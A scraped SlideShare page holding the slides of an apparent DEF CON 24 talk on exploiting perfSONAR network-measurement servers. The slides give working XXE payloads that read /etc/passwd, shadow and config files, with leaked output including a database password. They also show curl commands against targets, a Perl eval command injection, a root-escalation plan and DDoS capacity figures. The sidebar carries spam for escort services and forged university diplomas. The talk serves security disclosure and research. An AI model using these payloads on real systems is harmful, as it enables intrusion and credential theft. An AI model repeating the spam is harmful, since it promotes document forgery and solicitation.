Fully Automate Application Delivery with Puppet and F5 - PuppetConf 2014
 
Tips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software EngineeringTips And Tricks For Bioinformatics Software Engineering
Tips And Tricks For Bioinformatics Software Engineering
 
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
Overseeing Ship's Surveys and Surveyors Globally Using IoT and Docker by Jay ...
 
Ten practical ways to improve front-end performance
Ten practical ways to improve front-end performanceTen practical ways to improve front-end performance
Ten practical ways to improve front-end performance
 
Anomaly Detection at Scale
Anomaly Detection at ScaleAnomaly Detection at Scale
Anomaly Detection at Scale
 
Linked Data Tutorial
Linked Data TutorialLinked Data Tutorial
Linked Data Tutorial
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a Fox
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
 
Information Retrieval and Extraction
Information Retrieval and ExtractionInformation Retrieval and Extraction
Information Retrieval and Extraction
 

More from mark-smith

How Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security ProblemHow Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security Problemmark-smith
 
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the SandboxRemotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the Sandboxmark-smith
 
Applied Machine Learning for Data exfil and other fun topics
Applied Machine Learning for Data exfil and other fun topicsApplied Machine Learning for Data exfil and other fun topics
Applied Machine Learning for Data exfil and other fun topicsmark-smith
 
JailBreak DIY- Fried Apple
JailBreak DIY- Fried AppleJailBreak DIY- Fried Apple
JailBreak DIY- Fried Applemark-smith
 
The linux kernel hidden inside windows 10
The linux kernel hidden inside windows 10The linux kernel hidden inside windows 10
The linux kernel hidden inside windows 10mark-smith
 
Exploiting Curiosity and Context
Exploiting Curiosity and ContextExploiting Curiosity and Context
Exploiting Curiosity and Contextmark-smith
 
Abusing belkin home automation devices
Abusing belkin home automation devicesAbusing belkin home automation devices
Abusing belkin home automation devicesmark-smith
 
Greed for Fame Benefits Large Scale Botnets
Greed for Fame Benefits Large Scale BotnetsGreed for Fame Benefits Large Scale Botnets
Greed for Fame Benefits Large Scale Botnetsmark-smith
 
How your smartphone cpu breaks software level security and privacy
How your smartphone cpu breaks software level security and privacyHow your smartphone cpu breaks software level security and privacy
How your smartphone cpu breaks software level security and privacymark-smith
 
How to Make People Click on a Dangerous Link Despite their Security Awareness
How to Make People Click on a Dangerous Link Despite their Security Awareness How to Make People Click on a Dangerous Link Despite their Security Awareness
How to Make People Click on a Dangerous Link Despite their Security Awareness mark-smith
 
Technologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible CyberspaceTechnologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible Cyberspacemark-smith
 
Technologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible CyberspaceTechnologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible Cyberspacemark-smith
 

More from mark-smith (12)

How Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security ProblemHow Your DRAM Becomes a Security Problem
How Your DRAM Becomes a Security Problem
 
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the SandboxRemotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
 
Applied Machine Learning for Data exfil and other fun topics
Applied Machine Learning for Data exfil and other fun topicsApplied Machine Learning for Data exfil and other fun topics
Applied Machine Learning for Data exfil and other fun topics
 
JailBreak DIY- Fried Apple
JailBreak DIY- Fried AppleJailBreak DIY- Fried Apple
JailBreak DIY- Fried Apple
 
The linux kernel hidden inside windows 10
The linux kernel hidden inside windows 10The linux kernel hidden inside windows 10
The linux kernel hidden inside windows 10
 
Exploiting Curiosity and Context
Exploiting Curiosity and ContextExploiting Curiosity and Context
Exploiting Curiosity and Context
 
Abusing belkin home automation devices
Abusing belkin home automation devicesAbusing belkin home automation devices
Abusing belkin home automation devices
 
Greed for Fame Benefits Large Scale Botnets
Greed for Fame Benefits Large Scale BotnetsGreed for Fame Benefits Large Scale Botnets
Greed for Fame Benefits Large Scale Botnets
 
How your smartphone cpu breaks software level security and privacy
How your smartphone cpu breaks software level security and privacyHow your smartphone cpu breaks software level security and privacy
How your smartphone cpu breaks software level security and privacy
 
How to Make People Click on a Dangerous Link Despite their Security Awareness
How to Make People Click on a Dangerous Link Despite their Security Awareness How to Make People Click on a Dangerous Link Despite their Security Awareness
How to Make People Click on a Dangerous Link Despite their Security Awareness
 
Technologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible CyberspaceTechnologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible Cyberspace
 
Technologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible CyberspaceTechnologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible Cyberspace
 

Recently uploaded

定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一Fs
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一z xss
 
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一Fs
 
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja VipCall Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja VipCall Girls Lucknow
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With RoomVIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Roomishabajaj13
 
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls KolkataVIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书zdzoqco
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Roomdivyansh0kumar0
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts servicevipmodelshub1
 
Complet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled PersonComplet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled Personfurqan222004
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Dana Luther
 
Git and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMGit and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMgdsc13
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Excelmac1
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhimiss dipika
 
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一3sw2qly1
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作ys8omjxb
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Sonam Pathan
 

Recently uploaded (20)

定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
 
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
 
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja VipCall Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
Call Girls Service Adil Nagar 7001305949 Need escorts Service Pooja Vip
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
 
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With RoomVIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
 
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls KolkataVIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
 
Complet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled PersonComplet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled Person
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
 
Git and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMGit and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITM
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhi
 
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 

Attacking Network Infrastructure to Generate a 4 Tbs DDoS

  • 1. ATTACKING NETWORK INFRASTRUCTURE TO GENERATE A 4 TB/S DDOS FOR $5 by Luke Young
  • 2. $ WHOAMI ➤ Undergraduate Student - Junior ➤ 2nd year at DEF CON ➤ Website: bored.engineer ➤ Email: me@bored.engineer ➤ LinkedIn: https://www.linkedin.com/in/bored-engineer ➤ Twitter: @TheBoredEng
  • 3. DISCLAIMER ➤ The views and opinions expressed in this presentation are those of the authors and do not necessarily reflect the official policy or position of any current or previous employer. Examples of exploitation performed within this presentation are only examples and they should not be utilized in the real-world.
  • 4. AGENDA ➤ What is Internet2? ➤ What is perfSONAR? ➤ Exploiting perfSONAR ➤ Privilege Escalation to root ➤ Enumerating perfSONAR Instances ➤ Code Release and Q&A
  • 5. BACKSTORY ➤ “The Internet is a global system of interconnected networks. The University connects to both the global Internet and a number of special research and education networks commonly referred to as Internet2. These networks provide high bandwidth connectivity enabling and supporting research collaborations and educational opportunities regionally, nationally, and around the world.”
  • 6. WHAT IS A INTERNET2? ➤ “Internet2 is an exceptional community of U.S. and international leaders in research, academia, industry and government who create and collaborate via innovative technologies. Together, we accelerate research discovery, advance national and global education, and improve the delivery of public services.” ➤ 282 - Higher Education ➤ 86 - Corporations ➤ 66 - Affiliate members (Governments) ➤ 42 - Regional and State Education Networks
  • 7. ➤ Lookout ➤ Office 365 ➤ Rackspace ➤ SoftLayer ➤ Splunk ➤ VMWare ➤ Zoom WHAT IS A INTERNET2? ➤ AWS ➤ Azure ➤ Box ➤ Dropbox ➤ DocuSign ➤ Duo Security ➤ LastPass
  • 8. WHAT IS A INTERNET2?
  • 9. INTERNET2 PRODUCTS ➤ Trust Identity & Middleware ➤ InCommon Federation ➤ Shibboleth ➤ Performance & Analytics ➤ BWCTL - Bandwidth Test Controller ➤ NDT - Network Diagnostic Tool ➤ OWAMP - One-Way Ping ➤ perfSONAR - pS-Performance Toolkit
  • 13. XML EXTERNAL ENTITY PROCESSING (XXE) <?xml version="1.0"?> <!DOCTYPE author [ <!ELEMENT author (#PCDATA)> <!ENTITY ly "Luke Young"> ]> <presentations> <presentation> <name>Investigating the Practicality and Cost of Abusing Memory Errors</name> <location>DEF CON 23</location> <author>&ly;</author> </presentation> <presentation> <name>Attacking Network Infrastructure to Generate a 4 Tb/s DDoS for $5</name> <location>DEF CON 24</location> <author>&ly;</author> </presentation> </presentations>
  • 14. XML EXTERNAL ENTITY PROCESSING (XXE) <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
  • 15. XML EXTERNAL ENTITY PROCESSING (XXE) <?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo>
  • 18. PERFSONAR ISSUE #783 REBORN <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"> <nmwg:data> &xxe; </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
  • 19. PERFSONAR ISSUE #783 REBORN <SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type=“ErrorResponse"> <nmwg:data>root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin ... pulse:x:489:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin admin:x:500:505::/home/admin:/bin/bash sudo:x:501:506::/home/sudo:/bin/bash </nmwg:data> <nmwg:metadata id=“return_message"> <nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="return_message" id=“data_return_message"> <nmwgr:datum>Unknown messagetype: </nmwgr:datum> </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope> curl -X POST -d @passwd.xml http://perfSONAR:8090/
  • 20. PERFSONAR ISSUE #783 REBORN <soapenv:Envelope xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Body> <soapenv:Fault> <faultcode>soapenv:Server.Internal</faultcode> <faultstring>Error parsing message: I/O error : Permission denied I/O error : Permission denied :1: parser error : Failure to process entity xxe g:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"&gt; &lt;nmwg:data&gt; &amp;xxe; ^ :1: parser error : Entity 'xxe' not defined g:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"&gt; &lt;nmwg:data&gt; &amp;xxe; ^ at /opt/perfsonar_ps/oppd_mp/bin/oppd.pl line 760 </faultstring> </soapenv:Fault> </soapenv:Body> </soapenv:Envelope> curl -X POST -d @shadow.xml http://perfSONAR:8090/
  • 21. PERFSONAR ISSUE #783 REBORN <SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type=“ErrorResponse"> <nmwg:data>[main] sql_db_engine = django.db.backends.postgresql_psycopg2 sql_db_name = esmond sql_db_user = esmond sql_db_password = 7hc4m1 tsdb_root = %(ESMOND_ROOT)s/tsdb-data ... </nmwg:data> <nmwg:metadata id=“return_message"> <nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="return_message" id=“data_return_message"> <nmwgr:datum>Unknown messagetype: </nmwgr:datum> </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope> curl -X POST -d @esmond.xml http://perfSONAR:8090/
  • 22. PERFSONAR EXPLOITATION ➤ XXS and XXE abundant ➤ RCE seemed impossible
  • 24. PERFSONAR - BANDWIDTHGRAPH.CGI if ( scalar @childnodes == 1 ) { if ( $child->textContent =~ m/(E|e)rror/ || $child->textContent =~ m/Query returned 0 results/ ) { next; } } my %tsresult = (); my $throughput = eval( $child->getAttribute("throughput") ); my $eTime = $child->getAttribute("timeValue"); my $etimestamp; }
  • 26. PERFSONAR - BANDWIDTHGRAPH.CGI <nmwg:data id="data.16870844" metadataIdRef="metadata.7441249" xmlns:nmwg="http:// ggf.org/ns/nmwg/base/2.0/"> <iperf:datum throughput="8.23811e+08" timeType="iso" timeValue="Tue Oct 19 15:18:29.823998065 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.0573e+08" timeType="iso" timeValue="Tue Oct 19 16:17:55.2163317044 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.29349e+08" timeType="iso" timeValue="Tue Oct 19 17:17:55.3262506549 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.24512e+08" timeType="iso" timeValue="Tue Oct 19 18:20:02.81157432 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="9.04838e+08" timeType="iso" timeValue="Tue Oct 19 19:17:56.3379084847 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.16295e+08" timeType="iso" timeValue="Tue Oct 19 22:21:00.284368039 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.32728e+08" timeType="iso" timeValue="Tue Oct 19 23:17:55.2126511324 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> <iperf:datum throughput="8.18147e+08" timeType="iso" timeValue="Wed Oct 20 04:19:43.2927588221 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/> </nmwg:data>
  • 27. PERFSONAR - BANDWIDTHGRAPH.CGI my $cgi = new CGI; my $ma_url = $cgi->param('url'); my $key = $cgi->param('key'); ... if ( !defined $ma_url ) { print $cgi->header; my $errmsg = "Missing MA_URL"; my $errfile = HTML::Template->new( filename => "$basetmpldir/bw_error.tmpl" ); $errfile->param( ERRORMSG => $errmsg ); print $errfile->output; exit(1); } ... if ( !defined $key ) { ... if(!$key){ print $cgi->header; my $errmsg = "Unable to find matching MA key for provided parameters"; my $errfile = HTML::Template->new( filename => "$basetmpldir/bw_error.tmpl" ); $errfile->param( ERRORMSG => $errmsg ); print $errfile->output; exit(1); } }
  • 28. PERFSONAR - BANDWIDTHGRAPH.CGI my $res = &getData( $ma_url, $key, $start, $end ); ... sub getData() { foreach my $k (@keyList){ my $ma = new perfSONAR_PS::Client::MA( { instance => $ma_url } ); ... my $result = $ma->setupDataRequest( ... );
 ... my @childnodes = $root->findnodes("./*[local-name()='datum']"); ... foreach my $child (@childnodes) { ... my $throughput = eval( $child->getAttribute("throughput") ); ... } } }
  • 29. PERFSONAR - BANDWIDTHGRAPH.CGI <SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" id="message. 3046685" type=“EchoRequest"> <nmwg:metadata id=“metadata.12999789"> <nmwg:eventType>http://schemas.perfsonar.net/tools/admin/echo/2.0</ nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="metadata.12999789" id=“data.1942969”></nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
  • 30. PERFSONAR - BANDWIDTHGRAPH.CGI <SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"> <nmwg:metadata id="metadata.1337"> <nmwg:eventType>success.test</nmwg:eventType> </nmwg:metadata> <nmwg:data metadataIdRef="metadata.1337"> <iperf:datum throughput="`whoami`" timeValue="1 1 1 1:1:1 1" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"> </nmwg:data> </nmwg:message> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
  • 38. PERFSONAR - CONFIGMANAGER ➤ /etc/hosts ➤ /etc/ntp.conf ➤ /etc/ntp/step-tickers ➤ /etc/bwctld/bwctld.conf ➤ /etc/bwctld/bwctld.limits ➤ /etc/owampd/owampd.limits ➤ /usr/ndt/tcpbw100.html ➤ /opt/perfsonar_ps/ls_registration_daemon/ etc/ls_registration_daemon.conf ➤ /opt/perfsonar_ps/regular_testing/etc/ regular_testing.conf ➤ /opt/perfsonar_ps/toolkit/etc/ administrative_info ➤ /opt/perfsonar_ps/toolkit/etc/ enabled_services ➤ /opt/perfsonar_ps/toolkit/etc/ external_addresses ➤ /opt/perfsonar_ps/toolkit/etc/ ntp_known_servers
  • 40. Backup original bwctld.conf Use ConfigManager to stop bwctld Write executable posthook.pl Use ConfigManager to write new bwctld.conf Use ConfigManager to start bwctld PERFSONAR - CONFIGMANAGER Trigger a bwctl session, triggering posthook.pl as root Use ConfigManager to stop bwctld Remove posthook.pl Restore original bwctld.conf Use ConfigManager to start bwctld back to original configuration
  • 45.
  • 51. PERFSONAR NETWORK SUMMARY ➤ 970 Publicly routable nodes ➤ 12.51 TB of RAM ➤ 29.85 THz CPU Cycles ➤ Average Node: ➤ 13 GB of RAM ➤ 12 Cores at 2.6 GHz
  • 52. PERFSONAR THEORETICAL NETWORK SPEED 5.719 Tb/s
